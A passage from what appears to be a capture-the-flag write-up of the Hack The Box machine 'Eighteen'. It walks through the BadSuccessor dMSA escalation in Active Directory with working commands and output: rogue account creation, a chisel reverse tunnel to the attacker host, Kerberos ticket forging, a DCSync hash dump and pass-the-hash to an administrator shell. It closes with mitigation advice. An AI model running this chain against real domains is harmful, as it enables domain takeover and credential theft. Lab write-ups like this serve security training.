  • The Prerequisite: An attacker needs the ability to write a new computer object inside an OU (e.g. CreateChild rights). By creating a successor linked to a highly privileged predecessor (such as the Domain Administrator), the attacker can inherit administrative rights.

To analyze and exploit this vulnerability, the tool script Invoke-BadSuccessor.ps1 from researcher b5null (Invoke-BadSuccessor.ps1) was imported.

A tutorial for this vulnerability is detailed by The Weekly Purple Team.

Executing the Exploitation Chain

First, the script was imported to search for target OUs with the necessary permissions.

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Temp> . .\Invoke-BadSuccessor.ps1
*Evil-WinRM* PS C:\Temp> 
*Evil-WinRM* PS C:\Temp> Find-VulnerableOU


ObjectDN              : OU=Staff,DC=eighteen,DC=htb
IdentityReference     : EIGHTEEN\IT
SecurityIdentifier    : S-1-5-21-1152179935-589108180-1989892463-1604
ActiveDirectoryRights : CreateChild
AccessControlType     : Allow
IsInherited           : False

The group IT (of which adam.scott is a member) holds CreateChild permissions on the Staff Organizational Unit (OU). This allows the creation of machine and service objects.

The main Invoke-BadSuccessor execution command was run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\Temp> Invoke-BadSuccessor
[+] Created computer 'Pwn' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Machine Account's sAMAccountName : Pwn$
[+] Machine Account's SID             : S-1-5-21-1152179935-589108180-1989892463-12601

[+] Created delegated service account 'attacker_dMSA' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Service Account's sAMAccountName : attacker_dMSA$
[+] Service Account's SID             : S-1-5-21-1152179935-589108180-1989892463-12602
[+] Allowed to retrieve password      : Pwn$

[+] Added ACE on 'CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb' for 'adam.scott' (S-1-5-21-1152179935-589108180-1982463-1609) with rights 'All' (Allow, ThisObjectOnly).
[+] Granted 'GenericAll' on 'attacker_dMSA$' to 'adam.scott'.
[+] Configured delegated MSA state for 'attacker_dMSA$' with predecessor:
    CN=Administrator,CN=Users,DC=eighteen,DC=htb

[+] Next steps (Rubeus):
    Rubeus.exe hash /password:'Password123!' /user:Pwn$ /domain:eighteen.htb
    Rubeus.exe asktgt /user:Pwn$ /aes256:<AES256KEY> /domain:eighteen.htb
    Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:tit.kirbi /ticket:<BASE64TGT>

[+] Alternative (Impacket):
    getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'

The script successfully completed the following actions:

  1. Created computer account Pwn$ with password Password123!.
  2. Created a delegated Managed Service Account (dMSA) attacker_dMSA$.
  3. Granted adam.scott full control permissions over the dMSA.
  4. Linked the predecessor parameter of attacker_dMSA$ to the Domain Administrator account (CN=Administrator,CN=Users,DC=eighteen,DC=htb).

Bypassing Firewall with SOCKS5 Proxy

Since port 88 (Kerberos KDC) is blocked from external access, a reverse SOCKS5 tunnel was set up using chisel.

On the attacker host, the server listener was started:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ chisel server --port 6666 --reverse
2025/11/22 12:50:11 server: Reverse tunnelling enabled
2025/11/22 12:50:11 server: Fingerprint Wjresv0ZX2APVl0gkAjGhThCz6S7rIaUwfWfISAgE1s=
2025/11/22 12:50:11 server: Listening on http://0.0.0.0:6666
2025/11/22 12:58:43 server: session#1: Client version (1.11.3) differs from server version (1.13-0kali1)
2025/11/22 12:58:43 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

On the target shell, the client connector was launched:

1
2
3
4
5
*Evil-WinRM* PS C:\Temp> ./chisel.exe client  10.10.14.204:6666 R:1080:socks
chisel.exe : 2025/11/22 11:58:42 client: Connecting to ws://10.10.14.204:6666
    + CategoryInfo          : NotSpecified: (2025/11/22 11:5....10.14.204:6666:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2025/11/22 11:58:44 client: Connected (Latency 315.5866ms)

Requesting Kerberos Service Ticket

Using the Pwn$ computer account credentials, an S4U2self request was sent through the proxy tunnel to request a service ticket impersonating attacker_dMSA$.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(venv)(kali㉿kali)-[~/HTB/Eighteen]
└─$ proxychains python3 getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  EIGHTEEN.HTB:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  EIGHTEEN.HTB:88  ...  OK
[*] Impersonating attacker_dMSA$
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  eighteen.htb:88  ...  OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:0eb4880e2e45a8d9a8182761a4ca0f1229aa56cf03f2fa5c64f7327a187db257
[*] EncryptionTypes.rc4_hmac:b239f8ef77412c2dd9550c7069004699
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache

┌──(venv)(kali㉿kali)-[~/HTB/Eighteen]
└─$ export KRB5CCNAME=./attacker_dMSA\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache

The exported tickets allowed administrative access due to the successor configuration mapping.

Performing DCSync Attack & Password Extraction

The administrative ticket was used with secretsdump to perform a DCSync attack, extracting the Administrator’s NT hash from the domain controller database.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(venv)(kali㉿kali)-[~/HTB/Eighteen]
└─$ proxychains -q impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip $IP

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Next keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
[*] Cleaning up...

The recovered administrator NT hash is 0b133be956bfaddf9cea56701affddec.

Domain Takeover

A WinRM administrative shell was established using the Administrator’s hash via Pass-the-Hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ evil-winrm -i eighteen.htb -u Administrator -H 0b133be956bfaddf9cea56701affddec
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/22/2025  11:40 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
************0f5edcdc7b683e0921b67e

The system was fully compromised and root credentials were captured.


Mitigations & Security Recommendations

To secure the eighteen.htb domain against these attack pathways, the following defensive configurations are recommended:

  1. Active Directory Patch Management (Mitigate BadSuccessor):
    • Immediately apply Microsoft’s security updates containing hotfixes for CVE-2025-53779 on all domain controllers.
    • Windows Server 2025 systems must be patched to correct the propagation rules of DMSA computer objects during rotation.
  2. DACL Hardening on Organizational Units:
    • Audit the permission structure of all Organizational Units (specifically the Staff OU).
    • Revoke wildcard write privileges or CreateChild rights from non-administrative groups (such as the IT group) on OUs containing critical machine, user, or service accounts.
  3. Secure SQL Database Access Control:
    • Disable or restrict IMPERSONATE permissions within MSSQL. The ability for standard database users to impersonate higher-privileged configurations (appdev) should be restricted to the database administrator context.
    • Configure strong firewall rules to prevent outgoing SMB (port 445) connections from the database host to external networks. This prevents the exploitation of xp_dirtree to hijack NTLM hashes.
  4. Credential Hygiene Policies:
    • Enforce password complexity policies and run periodic credential sprays on internal accounts to identify password reuse.
    • Implement Multi-Factor Authentication (MFA) for administrative remote protocols such as WinRM, PowerShell Remoting, and RDP.
This post is licensed under CC BY 4.0 by the author.